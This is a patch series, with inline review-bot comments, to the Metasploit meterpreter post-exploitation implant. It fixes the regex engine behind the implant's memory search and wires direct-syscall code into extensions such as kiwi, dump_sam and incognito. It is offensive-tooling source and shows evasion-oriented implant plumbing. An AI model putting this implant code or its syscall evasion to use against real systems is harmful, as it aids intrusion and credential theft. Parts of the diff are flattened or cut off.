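Review bot: `matchstar` backtracks with `while (&text[text_offset] >= prepoint)` where `prepoint = text` is the buffer base rather than the offset at which the star began, so on failure it keeps retrying at every offset down to 0 — before the atoms already matched — and then decrements `text_offset` past zero, forming `&text[SIZE_MAX]` (out-of-bounds pointer arithmetic) and wrapping `*matchlength` below `prelen`, which also defeats the new `max_match_length > *matchlength` cap. Concretely, `ab*c` against `ca` reports a hit at index 1 with length 0, because the `c` at offset 0 is accepted as the tail. The backtrack range must be bounded by the star's starting offset; the function body and its `*matchlength = prelen;` reset end after this hunk, so the rewrite below covers only the backtracking loop.
```c
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
{
    size_t prelen = *matchlength;
    const size_t start_offset = text_offset; /* never backtrack before the star's own start */
    /* … unchanged: greedy forward loop … */
    for (;;)
    {
        if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength))
            return 1;
        if (text_offset == start_offset)
            break;
        text_offset--; (*matchlength)--;
    }
    /* … unchanged: *matchlength = prelen; return 0; … */
```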
@@ -376,17 +377,17 @@ static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_
 return 0;
 }
-static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
+static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
 {
 const char* prepoint = text;
- while ((text_offset < text_length) && matchone(p, text[text_offset]))
+ while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset]))
 {
 text_offset++; (*matchlength)++;
 }
 while (text > prepoint)
 {
- if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
+ if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength))
 return 1;
 (*matchlength)--;
 }
@@ -394,15 +395,15 @@ static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_
 return 0;
 }
-static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
+static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
 {
 if (p.type == UNUSED) return 1;
- if (matchpattern(pattern, text, text_length, text_offset, matchlength))
+ if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength))
 return 1;
- if ((text_offset < text_length) && matchone(p, text[text_offset++]))
+ if ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset++]))
 {
- if (matchpattern(pattern, text, text_length, text_offset, matchlength))
+ if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength))
 {
 (*matchlength)++;
 return 1;
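Review bot: `matchplus` can never match: `prepoint = text` and `text` is never reassigned in this port (the greedy loop advances `text_offset` instead), so `while (text > prepoint)` is false on every call and the function falls through to `return 0` no matter how many repetitions were consumed. Any needle using `+` (`[0-9]+`, `\w+`) therefore silently finds nothing, and the `*matchlength` increments from the greedy loop are not undone on that failure path either, leaking into the next offset `re_matchp` tries. Track the starting offset and backtrack down to a single repetition:
```c
static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
{
    const size_t prelen = *matchlength;
    const size_t start_offset = text_offset;
    while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset]))
    {
        text_offset++; (*matchlength)++;
    }
    /* '+' needs at least one repetition, so never backtrack to start_offset itself. */
    while (text_offset > start_offset)
    {
        if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength))
            return 1;
        (*matchlength)--;
    }
    *matchlength = prelen; /* report no consumption on failure */
    /* … unchanged: return 0; … */
```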
@@ -449,22 +450,22 @@ static int matchpattern(regex_t* pattern, const char* text, int *matchlength)
 #else
 /* Iterative matching */
-static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
+static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
 {
 size_t pre = *matchlength;
 do {
 if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK))
 {
- return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
+ return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength);
 }
 else if (pattern[1].type == STAR)
 {
- return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
+ return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength);
 }
 else if (pattern[1].type == PLUS)
 {
- return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
+ return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength);
 }
 else if ((pattern[0].type == END) && pattern[1].type == UNUSED)
 {
@@ -478,7 +479,7 @@ static int matchpattern(regex_t* pattern, const char* text, size_t text_length,
 */
 (*matchlength)++;
 }
- while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++]));
+ while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(*pattern++, text[text_offset++]));
 *matchlength = pre;
 return 0;
diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h
index 28956d263..1419df34a 100644
--- a/c/meterpreter/source/tiny-regex-c/re.h
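Review bot: In the literal-matching loop the new `(max_match_length > *matchlength)` test runs after `(*matchlength)++` has already counted the byte about to be compared, so a match of exactly `max_match_length` bytes is rejected: with `max_match_length == 3` the pattern `abc` never matches the text `abc`, and only literal runs of up to `max_match_length - 1` bytes get through. The `min(max_match_length, match_length)` clamp memory.c used before this series treated the limit as inclusive, and the star/plus loops test before incrementing, so this loop should be `while ((text_offset < text_length) && (*matchlength <= max_match_length) && matchone(*pattern++, text[text_offset++]));`. `matchpattern` begins before this hunk.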
@@ -59,7 +59,7 @@ typedef struct regex_t* re_t; #define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ /* Find matches of the compiled pattern inside text. */ -int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength); /* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); From 4f19a1c4aeffb443a29efb76c9675f9e6e855ed1 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Thu, 4 Jan 2024 16:34:08 +0000 Subject: [PATCH 05/14] Fix Memory Search variable shadowing --- .../stdapi/server/sys/process/memory.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 15cf165ad..8fd759ec7 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c 
@@ -595,39 +595,37 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
 {
 size_t current_buffer_offset = 0;
 size_t match_length = 0;
- int result = -1;
+ int match_result = -1;
 do {
 const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset;
 const size_t bytes_to_regex = bytes_read - current_buffer_offset;
- result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length);
+ match_result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length);
- if (result != -1)
+ if (match_result != -1)
 {
- const size_t match_address = read_address + current_buffer_offset + result;
+ const size_t match_address = read_address + current_buffer_offset + match_result;
 dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --");
 dprintf("[MEM SEARCH] Address: %p", match_address);
 if (match_length < min_match_length)
 {
 dprintf("[MEM SEARCH] Match length was too short, skipping.");
- current_buffer_offset += (result + match_length);
+ current_buffer_offset += (match_result + match_length);
 continue;
 }
- const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result;
+ const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + match_result;
 if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS)
 {
 dprintf("[MEM SEARCH] Adding search results to packet was not successful");
 }
- current_buffer_offset += (result + match_length);
+ current_buffer_offset += (match_result + match_length);
 }
-
 } while (result != -1);
-
 }
 memory_region_offset += bytes_to_read;
From d8fb9eaf95df6cd8798087130b3ff1faa51efcf9 Mon Sep 17 00:00:00 2001
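Review bot: `dprintf("[MEM SEARCH] Address: %p", match_address);` passes a `size_t` to a `%p` conversion, which the C standard only defines for a `void*` argument; it happens to line up on the Windows targets this builds for, but it is exactly what `-Wformat` flags, and the new `match_address` declaration in this hunk is the natural place to fix it. Either cast at the call, `dprintf("[MEM SEARCH] Address: %p", (void*)match_address);`, or print it as `%zx`. `request_sys_process_memory_search` begins before this hunk.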
From: Metasploit
Date: Thu, 4 Jan 2024 11:54:24 -0600
Subject: [PATCH 06/14] Bump metasploit-payloads to 2.0.164
---
 gem/lib/metasploit-payloads/version.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb
index ee31ed2ba..830cc80c6 100644
--- a/gem/lib/metasploit-payloads/version.rb
+++ b/gem/lib/metasploit-payloads/version.rb
@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
- VERSION = '2.0.163'
+ VERSION = '2.0.164'
 def self.version
 VERSION
From aeb6945bd26bcf6176123e1d442901927c77d86f Mon Sep 17 00:00:00 2001
From: sjanusz-r7
Date: Mon, 8 Jan 2024 10:10:16 +0000
Subject: [PATCH 07/14] Fix incorrect Memory Search variable name
---
 .../source/extensions/stdapi/server/sys/process/memory.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
index 8fd759ec7..ec404be30 100644
--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
@@ -625,7 +625,7 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
 current_buffer_offset += (match_result + match_length);
 }
- } while (result != -1);
+ } while (match_result != -1);
 }
 memory_region_offset += bytes_to_read;
From 6143148e22337c7b2ff93aeb67e492022bb148f8 Mon Sep 17 00:00:00 2001
From: Metasploit
Date: Mon, 8 Jan 2024 04:52:57 -0600
Subject: [PATCH 08/14] Bump metasploit-payloads to 2.0.165
---
 gem/lib/metasploit-payloads/version.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb
index 830cc80c6..c3dc1d272 100644
--- a/gem/lib/metasploit-payloads/version.rb
+++ b/gem/lib/metasploit-payloads/version.rb
@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
- VERSION = '2.0.164'
+ VERSION = '2.0.165'
 def self.version
 VERSION
From 7082431daef56452c30e9b5bede19037bd28375a Mon Sep 17 00:00:00 2001
From: Christophe De La Fuente Date: Fri, 3 Nov 2023 16:55:30 +0100 Subject: [PATCH 09/14] Pull in changes from ReflectiveDLLInjection to support direct syscalls - Includes ColdGate.c in each project - Change railgun macro name to stdcall_func - Update VS configs - Update cmake files for mingw - Fix cmake files for kiwi builds - Update ReflectiveDLLInjection module to verify if CI passes - Update include file names & ReflectiveDLLInjection submodule --- .gitmodules | 3 +- c/meterpreter/source/ReflectiveDLLInjection | 2 +- c/meterpreter/source/dump_sam/dump_sam.c | 1 + c/meterpreter/source/elevator/elevator.c | 1 + .../source/extensions/bofloader/bofloader.c | 1 + c/meterpreter/source/extensions/espia/espia.c | 1 + .../source/extensions/extapi/extapi.c | 1 + .../source/extensions/incognito/incognito.c | 1 + c/meterpreter/source/extensions/kiwi/main.c | 1 + .../source/extensions/lanattacks/lanattacks.c | 1 + .../source/extensions/peinjector/peinjector.c | 1 + .../source/extensions/powershell/powershell.c | 1 + c/meterpreter/source/extensions/priv/priv.c | 1 + .../source/extensions/python/python_main.c | 1 + .../source/extensions/sniffer/sniffer.c | 1 + .../stdapi/server/railgun/railgun.c | 104 +++++++++--------- .../stdapi/server/railgun/railgun.h | 2 +- .../source/extensions/stdapi/server/stdapi.c | 1 + .../source/extensions/unhook/unhook.c | 1 + .../winpmem/winpmem_meterpreter.cpp | 1 + c/meterpreter/source/metsrv/metsrv.c | 1 + c/meterpreter/source/metsrv/metsrv.h | 4 + c/meterpreter/source/screenshot/screenshot.c | 1 + c/meterpreter/workspace/CMakeLists.txt | 3 + .../ReflectiveDLLInjection/CMakeLists.txt | 19 ++++ .../ReflectiveDLLInjection.vcxproj | 12 ++ .../workspace/dump_sam/CMakeLists.txt | 2 +- .../workspace/dump_sam/dump_sam.vcxproj | 27 ++++- .../workspace/elevator/CMakeLists.txt | 2 +- .../workspace/elevator/elevator.vcxproj | 31 ++++-- .../ext_server_bofloader/CMakeLists.txt | 2 +- .../ext_server_bofloader.vcxproj | 42 +++++-- 
.../workspace/ext_server_espia/CMakeLists.txt | 2 +- .../ext_server_espia/ext_server_espia.vcxproj | 20 +++- .../ext_server_extapi/CMakeLists.txt | 2 +- .../ext_server_extapi.vcxproj | 20 +++- .../ext_server_incognito/CMakeLists.txt | 2 +- .../ext_server_incognito.vcxproj | 20 +++- .../workspace/ext_server_kiwi/CMakeLists.txt | 6 +- .../ext_server_kiwi/ext_server_kiwi.vcxproj | 18 +++ .../ext_server_kiwi.vcxproj.filters | 4 + .../ext_server_lanattacks/CMakeLists.txt | 2 +- .../ext_server_lanattacks.vcxproj | 20 +++- .../ext_server_peinjector/CMakeLists.txt | 2 +- .../ext_server_peinjector.vcxproj | 20 +++- .../ext_server_powershell/CMakeLists.txt | 2 +- .../ext_server_powershell.vcxproj | 20 +++- .../workspace/ext_server_priv/CMakeLists.txt | 6 +- .../ext_server_priv/ext_server_priv.vcxproj | 20 +++- .../ext_server_python/CMakeLists.txt | 2 +- .../ext_server_python.vcxproj | 18 ++- .../ext_server_python.vcxproj.filters | 3 + .../ext_server_sniffer/CMakeLists.txt | 2 +- .../ext_server_sniffer.vcxproj | 16 ++- .../ext_server_stdapi/CMakeLists.txt | 2 +- .../ext_server_stdapi.vcxproj | 20 +++- .../ext_server_unhook/CMakeLists.txt | 2 +- .../ext_server_unhook.vcxproj | 20 +++- .../ext_server_winpmem/CMakeLists.txt | 2 +- .../ext_server_winpmem.vcxproj | 20 +++- c/meterpreter/workspace/meterpreter.sln | 4 +- c/meterpreter/workspace/metsrv/CMakeLists.txt | 2 +- c/meterpreter/workspace/metsrv/metsrv.vcxproj | 21 +++- .../workspace/metsrv/metsrv.vcxproj.filters | 4 + .../workspace/screenshot/CMakeLists.txt | 2 +- .../workspace/screenshot/screenshot.vcxproj | 20 +++- 66 files changed, 507 insertions(+), 112 deletions(-) mode change 100644 => 100755 c/meterpreter/source/dump_sam/dump_sam.c mode change 100644 => 100755 c/meterpreter/source/elevator/elevator.c mode change 100644 => 100755 c/meterpreter/source/extensions/bofloader/bofloader.c mode change 100644 => 100755 c/meterpreter/source/extensions/espia/espia.c mode change 100644 => 100755 
c/meterpreter/source/extensions/extapi/extapi.c mode change 100644 => 100755 c/meterpreter/source/extensions/incognito/incognito.c mode change 100644 => 100755 c/meterpreter/source/extensions/lanattacks/lanattacks.c mode change 100644 => 100755 c/meterpreter/source/extensions/priv/priv.c mode change 100644 => 100755 c/meterpreter/source/extensions/sniffer/sniffer.c mode change 100644 => 100755 c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h mode change 100644 => 100755 c/meterpreter/source/extensions/stdapi/server/stdapi.c mode change 100644 => 100755 c/meterpreter/source/extensions/unhook/unhook.c mode change 100644 => 100755 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp mode change 100644 => 100755 c/meterpreter/source/metsrv/metsrv.c mode change 100644 => 100755 c/meterpreter/source/metsrv/metsrv.h mode change 100644 => 100755 c/meterpreter/source/screenshot/screenshot.c create mode 100644 c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt diff --git a/.gitmodules b/.gitmodules index 68c4a63e0..c9e32c313 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,7 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection - url = https://github.com/rapid7/ReflectiveDLLInjection.git + url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git + branch = direct_syscalls2 [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index fac3adab1..77be38083 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit fac3adab1187deade60eef27be8423ee117c1e1f +Subproject commit 77be380836a54218a76d1aadfd3846c1e62f0edd diff --git a/c/meterpreter/source/dump_sam/dump_sam.c b/c/meterpreter/source/dump_sam/dump_sam.c old mode 100644 new mode 100755 index 4e4f90041..4250198d3 
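Review bot: The submodule is repointed from `rapid7/ReflectiveDLLInjection` to a personal fork with a tracking `branch = direct_syscalls2`, which makes every build of this loader depend on a mutable branch in an individual's account: the pinned subproject commit protects a plain `git submodule update`, but `--remote` (and any CI configured that way) will follow the branch to whatever it points at later, and the fork can be deleted or force-pushed at any time. The commit message says this is to verify CI, so treat it as temporary — merge the direct-syscall changes upstream and restore `url = https://github.com/rapid7/ReflectiveDLLInjection.git` with no `branch` line before this lands. Reviewers should also diff the new subproject commit against the previous one, since the direct-syscall code it pulls in is compiled into every extension and the metsrv binary produced from this tree.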
--- a/c/meterpreter/source/dump_sam/dump_sam.c +++ b/c/meterpreter/source/dump_sam/dump_sam.c @@ -7,6 +7,7 @@ #define RDIDLL_NOEXPORT #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "ReflectiveLoader.c" diff --git a/c/meterpreter/source/elevator/elevator.c b/c/meterpreter/source/elevator/elevator.c old mode 100644 new mode 100755 index cd360f73f..aeeade136 --- a/c/meterpreter/source/elevator/elevator.c +++ b/c/meterpreter/source/elevator/elevator.c @@ -17,6 +17,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c old mode 100644 new mode 100755 index 8e8fe5d6e..869578620 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -13,6 +13,7 @@ // Required so that use of the API works. MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! @brief The enabled commands for this extension. */ diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c old mode 100644 new mode 100755 index 06787d0d6..7ada3666f --- a/c/meterpreter/source/extensions/espia/espia.c +++ b/c/meterpreter/source/extensions/espia/espia.c @@ -11,6 +11,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" Command customCommands[] = 
diff --git a/c/meterpreter/source/extensions/extapi/extapi.c b/c/meterpreter/source/extensions/extapi/extapi.c old mode 100644 new mode 100755 index f78025122..85a465074 --- a/c/meterpreter/source/extensions/extapi/extapi.c +++ b/c/meterpreter/source/extensions/extapi/extapi.c @@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "window.h" diff --git a/c/meterpreter/source/extensions/incognito/incognito.c b/c/meterpreter/source/extensions/incognito/incognito.c old mode 100644 new mode 100755 index ce97bce7b..af8eeb509 --- a/c/meterpreter/source/extensions/incognito/incognito.c +++ b/c/meterpreter/source/extensions/incognito/incognito.c @@ -15,6 +15,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" DWORD request_incognito_list_tokens(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/kiwi/main.c b/c/meterpreter/source/extensions/kiwi/main.c index fd47a8552..8186e3431 100755 --- a/c/meterpreter/source/extensions/kiwi/main.c +++ b/c/meterpreter/source/extensions/kiwi/main.c @@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "main.h" diff --git a/c/meterpreter/source/extensions/lanattacks/lanattacks.c b/c/meterpreter/source/extensions/lanattacks/lanattacks.c old mode 100644 new mode 100755 index db69a4fb7..476ecf4a2 --- a/c/meterpreter/source/extensions/lanattacks/lanattacks.c +++ b/c/meterpreter/source/extensions/lanattacks/lanattacks.c 
@@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "lanattacks.h" diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c index 6d7bccf38..cf005be73 100755 --- a/c/meterpreter/source/extensions/peinjector/peinjector.c +++ b/c/meterpreter/source/extensions/peinjector/peinjector.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "peinjector_bridge.h" diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c index a95ca1221..c9993abd9 100755 --- a/c/meterpreter/source/extensions/powershell/powershell.c +++ b/c/meterpreter/source/extensions/powershell/powershell.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "powershell_bridge.h" diff --git a/c/meterpreter/source/extensions/priv/priv.c b/c/meterpreter/source/extensions/priv/priv.c old mode 100644 new mode 100755 index 36cc04d73..6fa39cb5a --- a/c/meterpreter/source/extensions/priv/priv.c +++ b/c/meterpreter/source/extensions/priv/priv.c @@ -8,6 +8,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c index e7d9b8c55..09a862805 100755 --- a/c/meterpreter/source/extensions/python/python_main.c +++ b/c/meterpreter/source/extensions/python/python_main.c 
@@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "python_commands.h" diff --git a/c/meterpreter/source/extensions/sniffer/sniffer.c b/c/meterpreter/source/extensions/sniffer/sniffer.c old mode 100644 new mode 100755 index 45838ff87..44756bf8e --- a/c/meterpreter/source/extensions/sniffer/sniffer.c +++ b/c/meterpreter/source/extensions/sniffer/sniffer.c @@ -36,6 +36,7 @@ Command customCommands[] = // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){ met_api->packet.transmit_response(hErr, remote, response);return(hErr); } diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c index 879c9c7c6..67c18f186 100755 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c 
@@ -220,32 +220,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) #ifdef _WIN64 switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - case 
17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 